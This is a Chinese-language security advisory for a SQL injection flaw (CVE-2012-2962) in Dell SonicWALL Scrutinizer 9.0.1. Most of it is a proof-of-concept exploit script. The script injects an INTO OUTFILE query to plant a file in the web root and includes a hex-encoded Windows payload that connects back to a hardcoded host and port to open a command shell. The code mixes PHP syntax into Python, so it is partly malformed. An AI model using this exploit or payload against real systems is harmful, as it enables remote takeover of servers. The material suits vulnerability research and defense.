发布日期：2012-07-22
更新日期：2012-07-26

受影响系统：

Dell SonicWALL Scrutinizer 9.0.1
Dell SonicWALL Scrutinizer

描述：

---

BUGTRAQ  ID: 54625
CVE(CAN) ID: CVE-2012-2962

Dell SonicWALL Scrutinizer是多供应商的、应用通信分析可视化报告工具，可测量和解决网络性能和使用。

Dell SonicWALL Scrutinizer 9.0.1在实现上存在SQL注入漏洞，成功利用后可允许攻击者控制应用、访问或修改数据、利用下层数据库中的其他漏洞。

<*来源：Muts （muts@whitehat.co.il）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Muts （muts@whitehat.co.il）提供了如下测试方法：


import sys,urllib2,urllib

#php = "<?php echo system($_GET['c']); ?>"

$rhost="172.16.164.1";
$lport=4444;
function encode_ip($user_ip) {
    $ip = explode('.', $user_ip);
    return sprintf('%02x%02x%02x%02x', $ip[0], $ip[1], $ip[2], $ip[3]);
}
$string='4D5A900003Y004Y0FFFF0000B8YY00004ZZYY0BY000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24YY00005DCF9F8719AEF1D419AEF1D419AEF1D497B1E2D413AEF1D4E58EE3D418AEF1D45269636819AEF1D4YYY0504500004C0103000CF9E94FYYY0E0000F010B01050C0002Y006YY00001Y001Y002Y00004Y1Y0002Y4YYY4YYY04Y0004YY0002YY1Y1Y00001Y1YY0001YYYY0001C2Y3CZZZZZYYY0002Y1CZYYYY00002E74657874Y0B8Y0001Y0002Y004YYYYY0002Y602E72646174610000D4Y0002Y0002Y006YYYYY0004Y402E64617461Y00202Y03Y0002Y008YYYYY0004YCZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ066C7059E314000020066C705A0314000'. dechex($lport).'C705A2314000'. encode_ip($rhost). 'C705AE31400044Y0C705DA314Y01000068103040006801010000E86DY06A006A006A006A066A016A02E856Y08BF86A10689E31400057E853Y0893DE6314000893DEA314000893DEE31400068F231400068AE3140006A006A006A006A016A006A0068003040006A00E807Y06A00E806Y0FF2504204000FF2500204000FF2514204000FF250C204000FF2510204ZZZZZZZZZZZZZZZZZZZZZYYYYY0000862Y742YY000B02YBE2YA22YY000582YYYY0942Y002Y642YYYY0C82Y0C2ZYYY862Y742YY000B02YBE2YA22YY0004F0043726561746550726F636573734100009B004578697450726F63657373006B65726E656C33322E646C6C00004100575341536F636B657441000043005753415374617274757Y5600636F6E6E656374007773325F33322E646C6CZZZZZZZZZZZZZZZZZZZZ0000636D64ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZYYYYY000';
$a=str_replace("Z","000000000000000000000000000000",$string);
$php=str_replace("Y","00000",$a);

def exploit_mysql(target, phpScript):
    target += '/d4d/statusFilter.php'
    req = urllib2.Request(url = target)
    query = "AAA' " # First escape the sql query leaving everything valid
                    # then we dump the php-script into the web-server's directory
    query += "union select 0x%s,0 into outfile 'C:\\\\Program Files\\\\Scrutinizer\\\\html\\\\my.php'" % phpScript.encode('hex')
    query += "#"    # And finally we terminate the query
    values = { 'commonJson': 'protList',
               'q': query
               }
    req.add_data(urllib.urlencode(values))
    try:
        response = urllib2.urlopen(req)
    except:
        return(False)
    body = response.read()
#    print body
    if "No Results Found" in body:
        return(True)
    return(False)

if len(sys.argv) != 2:
    print "Usage: " + sys.argv[0] + " " + "http://www.example.com:8080/"
    sys.exit(0)

target = sys.argv[1]

print '[*] Trying to SQL inject on %s' % target
if exploit_mysql(target, php) == True:
        print '[*] Created a backdoor at %smy.php' % target
    urllib.urlopen('%smy.php' % target)

else:
        print '[*] Failed to backdoor the server'

建议：

---

厂商补丁：

Dell
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sonicwall.com/us/products/Scrutinizer.html

浏览次数：2833
严重程度：0（网友投票）